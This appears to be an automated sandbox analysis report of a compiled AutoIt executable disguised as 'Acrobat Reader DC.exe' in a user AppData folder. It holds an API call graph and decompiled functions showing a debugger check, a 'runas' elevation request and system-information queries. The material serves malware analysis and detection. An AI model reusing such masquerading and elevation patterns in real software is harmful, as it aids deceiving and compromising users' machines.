28437->28484 28496 403350 28440->28496 28442 40e4cb RegOpenKeyExW 28443 427190 RegQueryValueExW 28442->28443 28444 40e4eb 28442->28444 28445 4271b0 28443->28445 28446 42721a RegCloseKey 28443->28446 28444->28433 28447 4115d7 52 API calls 28445->28447 28446->28433 28448 4271cb 28447->28448 28503 43652f 52 API calls 28448->28503 28450 4271d8 RegQueryValueExW 28451 4271f7 28450->28451 28453 42720e 28450->28453 28452 402160 52 API calls 28451->28452 28452->28453 28453->28446 28455 41389e 28454->28455 28461 41381a 28454->28461 28456 4139e8 28455->28456 28458 413a00 28455->28458 28481 417f77 46 API calls __getptd_noexit 28456->28481 28483 417f77 46 API calls __getptd_noexit 28458->28483 28459 4139ed 28482 417f25 10 API calls __filbuf 28459->28482 28461->28455 28469 41388a 28461->28469 28476 419e30 46 API calls __filbuf 28461->28476 28464 41396c 28464->28455 28465 413967 28464->28465 28467 41397a 28464->28467 28465->28422 28466 413929 28466->28455 28468 413945 28466->28468 28478 419e30 46 API calls __filbuf 28466->28478 28480 419e30 46 API calls __filbuf 28467->28480 28468->28455 28468->28465 28472 41395b 28468->28472 28469->28455 28475 413909 28469->28475 28477 419e30 46 API calls __filbuf 28469->28477 28479 419e30 46 API calls __filbuf 28472->28479 28475->28464 28475->28466 28476->28469 28477->28475 28478->28468 28479->28465 28480->28465 28481->28459 28482->28465 28483->28465 28485 419f13 28484->28485 28486 419f0e 28484->28486 28493 417f77 46 API calls __getptd_noexit 28485->28493 28486->28485 28489 419f2b 28486->28489 28490 40e454 28489->28490 28495 417f77 46 API calls __getptd_noexit 28489->28495 28490->28425 28492 419f18 28494 417f25 10 API calls __filbuf 28492->28494 28493->28492 28494->28490 28495->28492 28497 403367 28496->28497 28498 403358 28496->28498 28499 4115d7 52 API calls 28497->28499 28498->28442 28500 403370 28499->28500 28501 4115d7 52 API calls 28500->28501 28502 40339e 28501->28502 28502->28442 28503->28450 28685 441165 40 API calls 28686 436366 IsWindowVisible 28687 441361 GetWindowLongW DestroyWindow 28688 443b61 15 API calls 28689 443561 CloseHandle WriteFile 28690 448d62 68 API calls 28691 421565 56 API calls __fassign_l 28693 44256c InternetSetOptionW InternetOpenW 28695 435d6a MkParseDisplayName 28697 44036a CreateProcessW CloseHandle DefDlgProcW 28699 416370 47 API calls 3 library calls 28700 443f76 SetFilePointerEx SetFilePointerEx WriteFile 28701 449b77 6 API calls 28702 432770 VariantCopy 28703 436577 GetWindowLongW GetParent SendMessageW 28704 43637e PostMessageW 28504 40e500 28505 40bc70 52 API calls 28504->28505 28506 40e515 GetVersionExW 28505->28506 28507 402160 52 API calls 28506->28507 28508 40e557 28507->28508 28530 40e660 28508->28530 28514 427674 28516 4276c6 GetSystemInfo 28514->28516 28520 4276d5 GetSystemInfo 28516->28520 28517 40e5e0 28517->28520 28544 40efd0 28517->28544 28518 40e5cd GetCurrentProcess 28551 40ef20 LoadLibraryA GetProcAddress 28518->28551 28523 40e629 28548 40ef90 28523->28548 28526 40e641 FreeLibrary 28527 40e644 28526->28527 28528 40e653 FreeLibrary 28527->28528 28529 40e656 28527->28529 28528->28529 28531 40e667 28530->28531 28532 42761d 28531->28532 28533 40c600 52 API calls 28531->28533 28534 40e55c 28533->28534 28535 40e680 28534->28535 28536 40e687 28535->28536 28537 427616 28536->28537 28538 40c600 52 API calls 28536->28538 28539 40e566 28538->28539 28539->28514 28540 40ef60 28539->28540 28541 40e5c8 28540->28541 28542 40ef66 LoadLibraryA 28540->28542 28541->28517 28541->28518 28542->28541 28543 40ef77 GetProcAddress 28542->28543 28543->28541 28545 40e620 28544->28545 28546 40efd6 LoadLibraryA 28544->28546 28545->28516 28545->28523 28546->28545 28547 40efe7 GetProcAddress 28546->28547 28547->28545 28552 40efb0 LoadLibraryA GetProcAddress 28548->28552 28550 40e632 GetNativeSystemInfo 28550->28526 28550->28527 28551->28517 28552->28550 28708 434b02 55 API calls moneypunct 28553 411703 28554 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 28553->28554 28555 411750 __IsNonwritableInCurrentImage 28554->28555 28557 41130a 51 API calls __cinit 28554->28557 28557->28555 28709 440306 DefDlgProcW 28710 432704 9 API calls 28711 445f03 SendMessageTimeoutW GetWindowThreadProcessId GetCurrentThreadId AttachThreadInput SetFocus 28712 43550b 71 API calls 28713 44870c 29 API calls 28714 433d09 GetClassNameW 28716 436108 CopyRect CopyRect 28717 440f0a 12 API calls 28718 443f0a 55 API calls moneypunct 28720 40b510 VariantClear 28721 442516 InternetSetOptionW InternetSetOptionW 28722 444310 32 API calls 28723 413d1a 63 API calls 5 library calls 28724 40bf20 171 API calls 28725 430727 GetWindowRect IsWindowVisible GetDlgCtrlID 28726 448123 14 API calls 2 library calls 28727 445934 56 API calls 28728 435f33 GetClientRect 28731 440d32 GetWindowLongW 28733 43293f 54 API calls 28735 43513e 54 API calls 28736 43333c 60 API calls __wcsicoll 28737 4165c1 5 API calls ___security_init_cookie 28738 4363c7 EnableWindow EnableWindow 28739 4313ca 65 API calls moneypunct 28740 433fce 6 API calls 28741 4485cb 7 API calls _memset 28742 40cbd0 VariantClear QueryPerformanceCounter QueryPerformanceFrequency 28743 441fd6 14 API calls 28746 4347d5 11 API calls 28747 444fd2 59 API calls 28748 431ddb CreateFileW SetFileTime CloseHandle 28749 4499db 14 API calls 28750 445be4 61 API calls __wcsicoll 28752 4447e0 11 API calls 28753 431be8 86 API calls 4 library calls 28754 40c1f0 200 API calls _wcslen 28755 40e9f0 141 API calls 28758 4319f5 CloseHandle CreateEventW 28759 4363f5 MoveWindow 28761 4443fc 15 API calls 28763 4311fc CoTaskMemAlloc _wcslen _wcscpy 28764 4439fb 53 API calls 28765 40f380 53 API calls 28768 440b82 8 API calls 28772 447b89 56 API calls 28773 436399 ShowWindow ShowWindow 28774 433998 GetFileAttributesW 28775 445b98 GetParent GetParent GetClassNameW GetFocus 28776 42159e 65 API calls __forcdecpt_l 28777 440d98 7 API calls 28778 43659e 10 API calls 28781 4367a3 SendMessageW SendMessageW 28782 4171a2 70 API calls 6 library calls 28783 4479a0 35 API calls 28784 42fda6 ClientToScreen ImageList_DragMove DefDlgProcW 28786 4403ae GetWindowLongW GetWindowRect GetWindowRect MoveWindow 28787 447ba8 90 API calls 28788 432fad MonitorFromRect 28789 40d3b0 296 API calls 28790 445db6 10 API calls 28792 4357b7 12 API calls 28793 4327b5 58 API calls __wcsicoll 28795 4151bb 66 API calls 12 library calls 28797 4115ba 46 API calls std::exception::exception 28798 4491b9 75 API calls __write_nolock 28799 4333be 9 API calls 28800 4435b9 8 API calls 28801 4465bb 129 API calls

                                  Executed Functions

                                  Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 98%
                                  			E0040D590(short* __eax, char __ecx, void* __eflags, void* __fp0) {
				char _v5;
				char _v6;
				short* _v24;
				short _v556;
				short _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				intOrPtr _t28;
				int _t31;
				char _t32;
				void* _t53;
				intOrPtr _t56;
				intOrPtr _t57;
				char _t60;
				short* _t73;
				void* _t80;

				_t89 = __fp0;
				_t80 = __eflags;
				_t60 = __ecx;
				_t73 = __eax;
				GetCurrentDirectoryW(0x104,  &_v556);
				E00401F20(_t60, _t80, _t73); // executed
				if(IsDebuggerPresent() != 0) {
					return MessageBoxA(0, "This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.", 0x484c92, 0x10);
				}
				_t25 =  *0x4a7f54; // 0x4
				if(_t25 == 0) {
					 *0x4974f4 = 0xffffffff;
					return SetCurrentDirectoryW( &_v556);
					L12:
				}
				_v5 = 0;
				if(_t25 == 1) {
					_t56 =  *0x4a7f5c; // 0xa52f18
					_v6 = 0;
					E00403A50(_t56, _t60, 0x4a90e8, 1, 0xffffffff);
					_t69 =  *0x4974e8;
					_t57 = _v6;
					 *0x4a90eb =  *0x4974e8;
					L5:
					_t28 =  *0x4a7f54; // 0x4
					if(E00401460(_t60, _t69, ?str?, _t28) != 0) {
						E0040EC50(0x4a90e8);
						_t31 = SetCurrentDirectoryW( &_v556);
						 *0x4974f4 = 1;
						return _t31;
					}
					if(_t57 == 1) {
						_t32 = E00432FEE();
						__eflags = _t32;
						if(_t32 != 0) {
							goto L7;
						}
						GetModuleFileNameW(0,  &_v1084, 0x104);
						__eflags = _v5;
						if(__eflags == 0) {
							ShellExecuteW(GetForegroundWindow(), L"runas",  &_v1084, _t73,  &_v556, 1);
						} else {
							_t79 =  &_v24;
							E00401B10("\"",  &_v24, __eflags);
							E0040D200(_t79, _t60, 0x4a7f6c, _t89);
							E0040D200(_t79, _t60, "\"", _t89);
							ShellExecuteW(GetForegroundWindow(), L"runas",  &_v1084, _v24,  &_v556, 1);
							E00402250(_t79);
						}
						L11:
						E0040EC50(0x4a90e8);
						return SetCurrentDirectoryW( &_v556);
						goto L12;
					}
					L7:
					E00410390(); // executed
					E00410570();
					if( *0x4a7f58 == 0) {
						E0040E0C0(0x4a8710, _t89);
					}
					E004091E0(0x4a8178, _t69, _t89, 1); // executed
					if( *0x4a7f58 == 0) {
						E00401000(0x4a8710);
					}
					goto L11;
				}
				_t53 = E0040F520(0x4a7f6c, 0x4a90e8, __fp0, 0x4a7f54); // executed
				if(_t53 == 0) {
					 *0x4974f4 = 1;
					return SetCurrentDirectoryW( &_v556);
					goto L12;
				} else {
					_t60 =  *0x4a90e8; // 0x1
					_t57 =  *0x4a90e9; // 0x0
					_t69 =  &_v1084;
					 *0x4a7f58 = _t60;
					GetFullPathNameW("C:\Users\frontdesk\AppData\Roaming\Windata\Acrobat Reader DC.exe", 0x104,  &_v1084, 0x4a7f50);
					goto L5;
				}
			}





















                                  0x0040d590
                                  0x0040d590
                                  0x0040d590
                                  0x0040d59c
                                  0x0040d5aa
                                  0x0040d5b1
                                  0x0040d5be
                                  0x00000000
                                  0x0042e1c9
                                  0x0040d5c4
                                  0x0040d5cb
                                  0x0042e1da
                                  0x00000000
                                  0x0040d699
                                  0x0040d699
                                  0x0040d5d1
                                  0x0040d5dd
                                  0x0042e1ea
                                  0x0042e1f4
                                  0x0042e1f8
                                  0x0042e1fd
                                  0x0042e203
                                  0x0042e206
                                  0x0040d62b
                                  0x0040d62b
                                  0x0040d63d
                                  0x0042e22c
                                  0x0042e238
                                  0x0042e23e
                                  0x00000000
                                  0x0042e23e
                                  0x0040d646
                                  0x0042e24d
                                  0x0042e252
                                  0x0042e254
                                  0x00000000
                                  0x00000000
                                  0x0042e268
                                  0x0042e26e
                                  0x0042e272
                                  0x0042e2e8
                                  0x0042e274
                                  0x0042e279
                                  0x0042e27c
                                  0x0042e288
                                  0x0042e294
                                  0x0042e2b9
                                  0x0042e2c1
                                  0x0042e2c1
                                  0x0040d688
                                  0x0040d68d
                                  0x00000000
                                  0x00000000
                                  0x0040d692
                                  0x0040d64c
                                  0x0040d64c
                                  0x0040d651
                                  0x0040d65d
                                  0x0040d664
                                  0x0040d664
                                  0x0040d670
                                  0x0040d67c
                                  0x0040d683
                                  0x0040d683
                                  0x00000000
                                  0x0040d67c
                                  0x0040d5f0
                                  0x0040d5f7
                                  0x0042e217
                                  0x00000000
                                  0x00000000
                                  0x0040d5fd
                                  0x0040d5fd
                                  0x0040d603
                                  0x0040d60e
                                  0x0040d61f
                                  0x0040d625
                                  0x00000000
                                  0x0040d625

                                  APIs
                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                    • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,00000104,?), ref: 00401F4C
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                    • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                    • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                  • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                  • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                    • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                  • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                  • MessageBoxA.USER32 ref: 0042E1C9
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                  • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                    • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                    • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                    • Part of subcall function 00410390: LoadImageW.USER32 ref: 0041040E
                                    • Part of subcall function 00410390: RegisterClassExW.USER32 ref: 0041045D
                                    • Part of subcall function 00410570: CreateWindowExW.USER32 ref: 004105A5
                                    • Part of subcall function 00410570: CreateWindowExW.USER32 ref: 004105CE
                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                    • Part of subcall function 0040E0C0: _memset.LIBCMT ref: 0040E0E2
                                    • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                  • String ID: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                  • API String ID: 2493088469-2808984075
                                  • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                  • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                  • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                  • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1214 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1223 40e582-40e583 1214->1223 1224 427674-427679 1214->1224 1227 40e585-40e596 1223->1227 1228 40e5ba-40e5cb call 40ef60 1223->1228 1225 427683-427686 1224->1225 1226 42767b-427681 1224->1226 1230 427693-427696 1225->1230 1231 427688-427691 1225->1231 1229 4276b4-4276be 1226->1229 1232 427625-427629 1227->1232 1233 40e59c-40e59f 1227->1233 1247 40e5ec-40e60c 1228->1247 1248 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1228->1248 1241 4276c6-4276ca GetSystemInfo 1229->1241 1230->1229 1239 427698-4276a8 1230->1239 1231->1229 1235 427636-427640 1232->1235 1236 42762b-427631 1232->1236 1237 40e5a5-40e5ae 1233->1237 1238 427654-427657 1233->1238 1235->1228 1236->1228 1243 40e5b4 1237->1243 1244 427645-42764f 1237->1244 1238->1228 1242 42765d-42766f 1238->1242 1245 4276b0 1239->1245 1246 4276aa-4276ae 1239->1246 1251 4276d5-4276df GetSystemInfo 1241->1251 1242->1228 1243->1228 1244->1228 1245->1229 1246->1229 1250 40e612-40e623 call 40efd0 1247->1250 1247->1251 1248->1247 1257 40e5e8 1248->1257 1250->1241 1256 40e629-40e63f call 40ef90 GetNativeSystemInfo 1250->1256 1260 40e641-40e642 FreeLibrary 1256->1260 1261 40e644-40e651 1256->1261 1257->1247 1260->1261 1262 40e653-40e654 FreeLibrary 1261->1262 1263 40e656-40e65d 1261->1263 1262->1263
                                  C-Code - Quality: 89%
                                  			E0040E500(intOrPtr* __edi, void* __eflags) {
				void* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v20;
				struct HINSTANCE__* _v24;
				struct HINSTANCE__* _v32;
				struct _SYSTEM_INFO _v68;
				char _v70;
				signed char _v72;
				struct _OSVERSIONINFOW _v352;
				void* __ebx;
				void* __esi;
				void* _t85;
				char _t86;
				struct HINSTANCE__* _t92;
				struct HINSTANCE__* _t97;
				intOrPtr* _t99;
				char _t105;
				intOrPtr* _t115;

				_t115 = __edi;
				_t116 = __edi + 0xc;
				E0040BC70(__edi + 0xc, __eflags);
				 *((char*)(__edi + 0x30)) = 0;
				_v352.dwOSVersionInfoSize = 0x11c;
				GetVersionExW( &_v352);
				 *((intOrPtr*)(__edi + 8)) = _v352.dwBuildNumber;
				 *__edi = _v352.dwMajorVersion;
				 *((intOrPtr*)(__edi + 4)) = _v352.dwMinorVersion;
				E00402160(__edi + 0xc,  &(_v352.szCSDVersion), _v352.dwMinorVersion, __edi);
				E0040E660(_t116);
				E0040E680(0x485330, _t116);
				_t85 =  *__edi - 5;
				 *((char*)(__edi + 0x2c)) = 0;
				 *((intOrPtr*)(__edi + 0x1c)) = 0;
				 *((intOrPtr*)(__edi + 0x20)) = 0;
				 *((intOrPtr*)(__edi + 0x24)) = 0;
				 *((intOrPtr*)(__edi + 0x28)) = 0;
				if(_t85 == 0) {
					_t86 =  *((intOrPtr*)(__edi + 4));
					__eflags = _t86;
					if(_t86 != 0) {
						__eflags = _t86 - 1;
						if(_t86 != 1) {
							__eflags = _t86 - 2;
							if(_t86 == 2) {
								__eflags = _v70 - 1;
								 *((char*)(__edi + 0x1d)) = 1;
								 *((char*)(__edi + 0x1f)) = 1;
								 *((char*)(__edi + 0x21)) = 1;
								if(_v70 != 1) {
									 *((char*)(__edi + 0x20)) = 1;
								} else {
									 *((char*)(__edi + 0x1e)) = 1;
								}
							}
						} else {
							 *((char*)(__edi + 0x1d)) = _t86;
							 *((short*)(__edi + 0x1e)) = 0x101;
						}
					} else {
						 *((short*)(__edi + 0x1c)) = 0x101;
					}
					 *((char*)(_t115 + 0x30)) = (_v72 & 0x000000ff) >> 0x00000006 & 0x00000001;
				} else {
					if(_t85 == 1) {
						_t105 =  *((intOrPtr*)(__edi + 4));
						 *((char*)(__edi + 0x1d)) = 1;
						 *((char*)(__edi + 0x1f)) = 1;
						 *((char*)(__edi + 0x21)) = 1;
						if(_t105 == 0) {
							__eflags = _v70 - 1;
							if(_v70 != 1) {
								 *((char*)(__edi + 0x23)) = 1;
								 *((short*)(__edi + 0x24)) = 0x101;
							} else {
								 *((short*)(__edi + 0x22)) = 0x101;
							}
						} else {
							if(_t105 != 1) {
								__eflags = _t105 - 2;
								if(_t105 == 2) {
									 *((short*)(__edi + 0x2a)) = 0x101;
									 *((char*)(__edi + 0x29)) = 1;
									 *((char*)(__edi + 0x27)) = 1;
									 *((char*)(__edi + 0x23)) = 1;
								}
							} else {
								 *((char*)(__edi + 0x23)) = _t105;
								 *((char*)(__edi + 0x25)) = _t105;
								if(_v70 != _t105) {
									 *((char*)(__edi + 0x27)) = 1;
									 *((short*)(__edi + 0x28)) = 0x101;
								} else {
									 *((short*)(__edi + 0x26)) = 0x101;
								}
							}
						}
					}
				}
				_v20 = 0;
				_v12 = 0;
				E0040EF60( &_v20);
				_t127 = _v12;
				if(_v12 != 0) {
					_push( &_v8);
					_v8 = 0;
					_push(GetCurrentProcess());
					 *((intOrPtr*)(E0040EF20( &_v20, _t127)))();
					if(_v8 == 1) {
						 *((char*)(_t115 + 0x2c)) = 1;
					}
				}
				_v68.dwOemId = 0;
				_v68.dwPageSize = 0;
				_v68.lpMinimumApplicationAddress = 0;
				_v68.lpMaximumApplicationAddress = 0;
				_v68.dwActiveProcessorMask = 0;
				_v68.dwNumberOfProcessors = 0;
				_v68.dwProcessorType = 0;
				_v68.dwAllocationGranularity = 0;
				_v68.wProcessorLevel = 0;
				if( *((intOrPtr*)(_t115 + 0x2c)) == 0) {
					GetSystemInfo( &_v68);
				} else {
					_v32 = 0;
					_v24 = 0;
					E0040EFD0( &_v32);
					_t130 = _v24;
					if(_v24 == 0) {
						GetSystemInfo( &_v68);
					} else {
						_t99 = E0040EF90( &_v32, _t130); // executed
						 *_t99( &_v68); // executed
					}
					_t97 = _v32;
					if(_t97 != 0) {
						FreeLibrary(_t97);
					}
				}
				_t92 = _v20;
				 *((short*)(_t115 + 0x2e)) = _v68.dwOemId;
				if(_t92 != 0) {
					FreeLibrary(_t92);
				}
				return _t115;
			}





















                                  0x0040e500
                                  0x0040e50b
                                  0x0040e510
                                  0x0040e51c
                                  0x0040e520
                                  0x0040e52a
                                  0x0040e542
                                  0x0040e54d
                                  0x0040e54f
                                  0x0040e552
                                  0x0040e557
                                  0x0040e561
                                  0x0040e56a
                                  0x0040e56d
                                  0x0040e570
                                  0x0040e573
                                  0x0040e576
                                  0x0040e579
                                  0x0040e57c
                                  0x00427674
                                  0x00427677
                                  0x00427679
                                  0x00427683
                                  0x00427686
                                  0x00427693
                                  0x00427696
                                  0x00427698
                                  0x0042769c
                                  0x004276a0
                                  0x004276a4
                                  0x004276a8
                                  0x004276b0
                                  0x004276aa
                                  0x004276aa
                                  0x004276aa
                                  0x004276a8
                                  0x00427688
                                  0x00427688
                                  0x0042768b
                                  0x0042768b
                                  0x0042767b
                                  0x0042767b
                                  0x0042767b
                                  0x004276be
                                  0x0040e582
                                  0x0040e583
                                  0x0040e585
                                  0x0040e588
                                  0x0040e58c
                                  0x0040e590
                                  0x0040e596
                                  0x00427625
                                  0x00427629
                                  0x00427636
                                  0x0042763a
                                  0x0042762b
                                  0x0042762b
                                  0x0042762b
                                  0x0040e59c
                                  0x0040e59f
                                  0x00427654
                                  0x00427657
                                  0x0042765d
                                  0x00427663
                                  0x00427667
                                  0x0042766b
                                  0x0042766b
                                  0x0040e5a5
                                  0x0040e5a5
                                  0x0040e5a8
                                  0x0040e5ae
                                  0x00427645
                                  0x00427649
                                  0x0040e5b4
                                  0x0040e5b4
                                  0x0040e5b4
                                  0x0040e5ae
                                  0x0040e59f
                                  0x0040e596
                                  0x0040e583
                                  0x0040e5bd
                                  0x0040e5c0
                                  0x0040e5c3
                                  0x0040e5c8
                                  0x0040e5cb
                                  0x0040e5d0
                                  0x0040e5d1
                                  0x0040e5da
                                  0x0040e5e0
                                  0x0040e5e6
                                  0x0040e5e8
                                  0x0040e5e8
                                  0x0040e5e6
                                  0x0040e5ee
                                  0x0040e5f1
                                  0x0040e5f4
                                  0x0040e5f7
                                  0x0040e5fa
                                  0x0040e5fd
                                  0x0040e600
                                  0x0040e603
                                  0x0040e606
                                  0x0040e60c
                                  0x004276d9
                                  0x0040e612
                                  0x0040e615
                                  0x0040e618
                                  0x0040e61b
                                  0x0040e620
                                  0x0040e623
                                  0x004276ca
                                  0x0040e629
                                  0x0040e62d
                                  0x0040e632
                                  0x0040e632
                                  0x0040e634
                                  0x0040e63f
                                  0x0040e642
                                  0x0040e642
                                  0x0040e63f
                                  0x0040e644
                                  0x0040e64b
                                  0x0040e651
                                  0x0040e654
                                  0x0040e654
                                  0x0040e65d

                                  APIs
                                  • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                  • FreeLibrary.KERNEL32(?), ref: 0040E642
                                  • FreeLibrary.KERNEL32(?), ref: 0040E654
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                  • String ID: 0SH
                                  • API String ID: 3363477735-851180471
                                  • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                  • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                  • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                  • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040EBD0(struct HINSTANCE__** __esi) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				if(__esi[2] == 0) {
					_t3 = LoadLibraryA("uxtheme.dll"); // executed
					 *__esi = _t3;
					if(_t3 != 0) {
						_t4 = GetProcAddress(_t3, "IsThemeActive");
						__esi[2] = _t4;
						return _t4;
					}
				}
				return _t3;
			}





                                  0x0040ebd4
                                  0x0040ebdb
                                  0x0040ebe1
                                  0x0040ebe5
                                  0x0040ebed
                                  0x0040ebf3
                                  0x00000000
                                  0x0040ebf3
                                  0x0040ebe5
                                  0x0040ebf6

                                  APIs
                                  • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: IsThemeActive$uxtheme.dll
                                  • API String ID: 2574300362-3542929980
                                  • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                  • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                  • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
